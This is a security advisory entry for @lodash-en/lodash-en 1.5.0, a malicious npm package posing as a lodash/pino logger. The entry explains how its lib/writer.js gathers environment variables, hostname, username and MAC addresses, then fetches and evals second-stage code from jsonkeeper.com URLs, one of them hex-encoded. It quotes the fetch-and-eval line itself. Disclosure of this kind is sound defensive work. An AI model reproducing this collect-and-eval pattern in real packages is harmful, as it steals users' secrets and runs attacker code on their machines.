VDB
GCVE-110-OSM-2026-1363
GCVE-110-OSM-2026-1363
Advisory PublishedCVSS 9.6/10
Executes remote second-stage code fetched from attacker-controlled domain www.jsonkeeper.com (https://www.jsonkeeper.com/b/HQJXY) via axios.get + eval in lib/writer.js, with full process.env, hostname, username, and MAC addresses staged in a data object in closure scope. A secondary C2 endpoint (https://www.jsonkeeper.com/b/HY6M6) is constructed via hex-obfuscation using the same axios.get pattern. Masquerades as a lodash/pino logger utility; package now fully unpublished.
lib/writer.js collects data = { ...process.env, platform, hostname, username, macAddresses } then calls require('axios').get('https://www.jsonkeeper.com/b/HQJXY').then(r => { eval(r.data.content); }). The eval'd content executes with the data object in scope. A second C2 (https://www.jsonkeeper.com/b/HY6M6) is hex-encoded in hl array, using the same axios.get chain — shared infrastructure with sibling package fastjsonlog.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | @lodash-en/lodash-en | 1.5.0 (affected) | — |
Browse GCVE Records
72,921 records in the GCVE database · Updated July 15, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.